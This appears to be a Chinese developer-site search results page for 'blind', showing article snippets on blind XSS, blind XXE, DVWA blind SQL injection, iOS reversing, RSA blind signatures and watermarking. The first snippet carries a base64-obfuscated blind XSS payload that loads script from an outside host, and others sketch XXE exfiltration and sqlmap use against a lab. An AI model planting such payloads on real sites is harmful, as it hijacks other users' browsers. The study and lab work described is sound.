首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Khan安全团队

    Blind XSS

    "><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vc2x3YS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>

    41920编辑于 2022-07-13
  • 来自专栏全栈程序员必看

    duilib是什么_double blind

    在第8个教程【2013 duilib入门简明教程 — 完整的自绘标题栏(8)】中,可以发现窗口最大化之后有两个问题,

    1.6K30编辑于 2022-11-15
  • 来自专栏小汪Waud

    科学术语扫盲:blind testing

    These four constructs were assigned different codes for blind testing of resistance and fitness phenotypes . ” 里面提到了一个词: blind testing,我们今天就来讲一讲这个词。 10.1038/nature22372 blind testing 是一种实验设计方法,其中实验参与者或评估者在测试过程中对被测试物品的身份或特征一无所知。 在本文中作者使用了“blind testing”来评估抗病性和适应性的表型。通过为不同构建分配不同的代码,使评估者在进行测试时对抗病性和适应性的结果不知情,从而确保评估的客观性。

    44520编辑于 2023-09-18
  • 来自专栏Seebug漏洞平台

    “盲”逆向:iOS 应用 Blind 寻踪

    原文地址:《"BLIND" Reversing - A Look At The Blind iOS App》 译者:hello1900@知道创宇404实验室 发表时间:2017年11月7日 前言 “ Blind是一款用于工作场合的匿名社区应用。” 如上文所述,Blind允许通过工作邮件或LinkedIn账户登录。 如前文所述,我没有注册Blind 账户,因此无法使用会员功能。但这些都无妨,我只对Burp上的一些数据感兴趣。考虑到应用程序性质与要求,我打算探索更多内容。因此,并无恶意流量发送至Blind服务器。 本文可用于围绕Blind应用开展进一步调研。对于提供信息的采用,本博客不承担任何责任。

    1.4K70发布于 2018-03-16
  • 来自专栏谢公子学安全

    渗透测试|利用Blind XXE Getshell(Java网站)

    目录 Blind XXE读取任意文件Getshell 这是一道类似CTF的题目。话不多说 访问链接,如下。于是随便输入任意数字,点击Create Account 抓包重放,发现是XML提交的格式。 root/> <reg><name>111</name><tel>222</tel><email>333</email></reg> 现在已经证明了该网站存在XXE漏洞,但是由于无回显,所以我们只能利用Blind Blind XXE读取任意文件Getshell 首先,在我们的VPS上建立一个xml.dtd文件,内容如下。然后建立起一个HTTP服务,访问路径为:http://vps的IP/xml.dtd <! 然后成功连上目标主机 注: 这里通过监听2121端口的流量读取的数据,是从 RETR 开始后面的这些 相关文章:记一次利用BLIND OOB XXE漏洞获取文件系统访问权限的测试 来源:谢公子的博客

    3.4K00编辑于 2022-01-19
  • 来自专栏Seebug漏洞平台

    “盲”逆向:iOS 应用 Blind 寻踪

    Blind是一款用于工作场合的匿名社区应用。” 如上文所述,Blind允许通过工作邮件或LinkedIn账户登录。登录后将看到创建账户选项: ? [iPhone::com.teamblind.blind]-> %resume [iPhone::com.teamblind.blind]-> observeSomething('*[* *AES256EncryptWithKey 如前文所述,我没有注册Blind 账户,因此无法使用会员功能。但这些都无妨,我只对Burp上的一些数据感兴趣。考虑到应用程序性质与要求,我打算探索更多内容。因此,并无恶意流量发送至Blind服务器。 本文可用于围绕Blind应用开展进一步调研。对于提供信息的采用,本博客不承担任何责任。

    1.8K140发布于 2018-03-30
  • 来自专栏网络安全技术点滴分享

    XSSpecter - Blind XSS 检测与管理工具

    详细安装说明请参考(server/INSTALLATION.md)和(CLI/INSTALLATION.md)。

    27210编辑于 2025-06-16
  • 来自专栏人人都是架构师

    text_blind_watermark%3A 给文本加隐水印

    把信息不可见地嵌入到文本中 from text_blind_watermark import TextBlindWatermark2 password = '20190808' text = '这句话中有盲水印 = text_blind_wm.embed(text=text, watermark=watermark) print(text_with_wm) 从文本中提取不可见的信息 text_blind_wm2 = TextBlindWatermark2(password=password) wm_extract = text_blind_wm2.extract(text_with_wm) print('提取内容 watermark = 'github.com/guofei9987' text_blind_wm = TextBlindWatermark2(password=password, chr_type =(3, 4)) text_with_wm = text_blind_wm.embed(text=text, watermark=watermark) print(text_with_wm) text_blind_wm2

    40610编辑于 2025-01-18
  • 来自专栏FreeBuf

    Blind XXE详解与Google CTF一道题分析

    现在来看有回显的XXE已经很少了,Blind XXE重点在于如何将数据传输出来。 这篇文章将详细分析这两种Blind XXE的原理和为啥需要引入外部DTD文件,最后也发现一些情况不用引入外部DTD文件也能直接做的情况(今年google ctf 就可以) 下面测试就用以下的php代码来测试 ENTITY 实体名 实体的值 > //内部实体 Blind XXE 需要使用到DTD约束自定义实体中的参数实体。参数实体是只能在DTD中定义和使用的实体,以%为标志定义,定义和使用方法如下 <? 基于报错的Blind XXE 基于报错的原理和OOB类似,OOB通过构造一个带外的url将数据带出,而基于报错是构造一个错误的url并将泄露文件内容放在url中,通过这样的方式返回数据。 Blind XXE部分。

    2.2K30发布于 2019-07-17
  • 来自专栏FreeBuf

    记我的一次账号劫持和BLIND XSS漏洞发现过程

    第二个漏洞 - BLIND XSS 由于目标测试网站开通有付费版的专业高级功能模块,所以我决定付钱来购买进行测试。这个购买付费方式有两种,也即信用卡和银行转账。 之后,我就在其中插入了一个利用 XSSHunter 生成的 BLIND XSS Payload,一切就静等上钩吧。 几天之后,我无意间浏览了我的XSSHunter账户,出乎意料地发现,那段插入的BLIND XSS Payload竟然在目标测试网站的控制面板管理区域被成功触发了!

    1.2K00发布于 2018-07-30
  • 网络安全 DVWA通关指南 DVWA SQL Injection (Blind SQL盲注)

    DVWA SQL Injection (Blind) Impossible 参考文献 WEB 安全靶场通关指南 相关阅读 Brute Force (爆破) Command Injection(命令注入 Forgery (CSRF) File Inclusion(文件包含) File Upload(文件上传) SQL Injection(SQL注入) SQL Injection (Blind sqlmap -u "http://dvwa/vulnerabilities/sqli_blind/? sqlmap -u "http://dvwa/vulnerabilities/sqli_blind/? 抓包内容如下: POST /vulnerabilities/sqli_blind/cookie-input.php HTTP/1.1 Host: dvwa User-Agent: Mozilla/5.0

    1.2K10编辑于 2025-08-19
  • 来自专栏公共互联网反网络钓鱼(APCN)

    Blind Eagle”借匿名主机卷土重来,拉美多国金融系统拉响警报

    近期,国际网络安全机构发出警告:南美洲长期活跃的黑客组织“Blind Eagle”(又称“AguilaCiega”或APT-C-36)正利用俄罗斯的“子弹头”托管服务Proton66,对哥伦比亚等国的金融机构发起新一轮网络钓鱼攻击 值得注意的是,这并非“Blind Eagle”首次作案。该组织长期专注于南美地区,尤其针对政府、金融和能源部门,具有明显的地缘政治意图。

    22610编辑于 2025-10-15
  • 来自专栏DevOps

    Python:通过blind_watermark为图片嵌入文本,图片,二进制水印实践

    简介 基于频域的数字盲水印, 一、实践 # -*- coding: utf-8 -*- from blind_watermark import WaterMark # pip install blind-watermark ) if __name__ == '__main__': mark_text() unmark_text() 小结 参考:https://gitee.com/guofei9987/blind_watermark https://blindwatermark.github.io/blind_watermark/#/zh/README

    65710编辑于 2024-03-29
  • 来自专栏Khan安全团队

    CVE-2021-22911:Pre-Auth Blind NoSQL 注入导致 Rocket Chat 3.12.1 RCE

    预认证盲 NoSQL 注入导致 Rocket Chat 3.12.1 中的远程代码执行

    2.7K30发布于 2021-07-08
  • 来自专栏FreeBuf

    Bropper:一款功能强大的自动化Blind ROP利用工具

    关于Bropper Bropper是一款功能强大的自动化Blind ROP利用工具,所谓Blind ROP,简称BROP,指的是没有对应应用程序的源代码或者二进制文件下,对程序进行攻击,劫持程序的执行流

    58620编辑于 2023-09-18
  • 来自专栏FreeBuf

    记一次利用BLIND OOB XXE漏洞获取文件系统访问权限的测试

    这一次,响应内容又是空的,和未指定任何内容类型的简单POST请求响应一样,由此,我推断该服务端能正常处理XML数据,这样一来,我想尝试利用BLIND XXE攻击方式来触发其漏洞。

    1.6K50发布于 2018-04-17
  • 来自专栏Python七号

    保护版权,用 Python 为图片添加盲水印

    为图片添加盲水印,自然是搜索相关的工具,通常情况下,我会去 GitHub 输入英文关键字进行搜索,搜索结果如下: 选择 star 数量最多的通常错不了,guofei9987/blind_watermark 安装开发版本: git clone git@github.com:guofei9987/blind_watermark.git cd blind_watermark pip install . 该工具用到的其他库: numpy>=1.17.0 opencv-python setuptools PyWavelets 2、添加文本水印与提取 添加文本水印: from blind_watermark 留言讨论 参考资料 [1] 旋转攻击.py: https://github.com/guofei9987/blind_watermark/blob/master/examples/旋转攻击.py [2] guofei9987/blind_watermark/blob/master/examples/缩放攻击.py [6] 椒盐击.py: https://github.com/guofei9987/blind_watermark

    5.5K10发布于 2021-10-08
  • 来自专栏数安视界

    随笔记录之RSA 盲签名

    (public_key.key_size, byteorder = 'big') def blind_sign(blind_hash_digest: bytes, private_key: RSAPrivateKey : 签名者的私钥 Returns: 盲化签名值 """ blind_hash_value: int = int.from_bytes(blind_hash_digest, byteorder = 'big') blind_sign_value: int = pow(blind_hash_value, private_key.private_numbers().d, private_key.public_key (blind_sign_value, 'big') real_sign: int = blind_sign * pow(r, -1, public_key.public_numbers().n) = blind_msg(raw_msg, pub_key, hash_alg) # 签名者对盲化的消息进行盲签名 sign_value = blind_sign(blind_hash

    1.9K3421编辑于 2023-08-31
  • 来自专栏农夫安全

    Bwapp漏洞平台答案全解-A1(第三篇)

    -1.25-SQL Injection - Blind - Boolean-Based SQL盲注-基于布尔 ? *1.26-SQL Injection - Blind - Time-Based 时间盲注,未做手工测试,可自行百度, 使用sqlmap可跑 -1.27-SQL Injection - Blind (SQLite ) SQL盲注- -1.28-SQL Injection - Blind (WS/SOAP) ?

    2.2K41发布于 2018-03-30
  • 来自专栏机器之心

    重磅!NeurIPS 2018 AutoML中国队伍表现强势!Phase1冠亚季队伍联合经验分享

    Blind-Test 阶段由 Autodidact.ai、Meta_Learners、GrandMasters 斩获前三名。 图 2:Blind-Test 阶段排行榜 上图分别展示了 Feed-Back 阶段及 Blind-Test 阶段的排行榜。 比赛说明中明确 Blind-Test 与 Feed-Back 的数据是可比的,在 Feed-Back 阶段中 Top 队伍都能在限制的时间和内存内完成 5 项任务的建模,然而在 Blind-Test 中 Feed-Back 阶段具有领先优势的 Top 队伍在 Blind-Test 中因在某个数据或者特征量相对较大的任务上没能在限制的内存之内完成 AutoML 的整个建模流程,因此在 Blind-Test 对比 Feed-Back Top3 队伍与 Blind Test Top3 队伍的成绩,从平均 Rank 指标上 Feed-Back Top3 均值为 2.8,Blind Test Top3 队伍的均值为

    77160发布于 2018-12-25
领券